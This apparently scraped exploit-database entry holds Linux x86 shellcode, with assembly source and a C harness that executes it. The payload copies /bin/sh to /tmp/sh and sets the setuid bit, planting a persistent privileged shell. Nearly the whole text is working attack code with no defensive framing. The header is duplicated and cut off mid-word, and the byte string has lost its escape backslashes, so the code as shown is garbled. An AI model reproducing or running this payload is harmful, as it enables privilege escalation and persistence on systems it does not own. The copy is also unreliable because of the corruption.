/*
Title: Linux/x86 - cp /bin/sh /tmp/sh; chmod +s /tmp/sh
Author: absolomb
Website: https://www.sploitspren.com
SLAE-ID: 1208
Purpose: cp shell into /tmp and setui /*
Title: Linux/x86 - cp /bin/sh /tmp/sh; chmod +s /tmp/sh
Author: absolomb
Website: https://www.sploitspren.com
SLAE-ID: 1208
Purpose: cp shell into /tmp and setuid
Tested On: Ubuntu 14.04
Arch: x86
Size: 74 bytes
Shellcode is register independent and null free.
global _start
section .text
_start:
push 0xb ; execve()
pop eax ;
cdq ; set edx to 0
push edx ; NULL
push word 0x632d ; "c-"
mov edi,esp ; point edi to stack
push edx ; NULL
push 0x68732f2f ; "hs//"
push 0x6e69622f ; "/bin"
mov ebx,esp ; point ebx to stack
push edx ; NULL
jmp short cmd
execute:
push edi ; "c-"
push ebx ; "/bin/sh"
mov ecx,esp ; point to stack
int 0x80 ; execute execve
cmd:
call execute
db "cp /bin/sh /tmp/sh; chmod +s /tmp/sh"
*/
#include<stdio.h>
#include<string.h>
unsigned char code[] =
"x6ax0bx58x99x52x66x68x2dx63x89xe7x52x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x52xebx06x57x53x89xe1xcdx80xe8xf5xffxffxffx63x70x20x2fx62x69x6ex2fx73x68x20x2fx74x6dx70x2fx73x68x3bx20x63x68x6dx6fx64x20x2bx73x20x2fx74x6dx70x2fx73x68";
main()
{
printf("Shellcode Length: %d
", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}
Linux x86 Setuid Shell Shellcode
- Details
- Written by: khalil shreateh
- Category: Vulnerabilities
- Hits: 529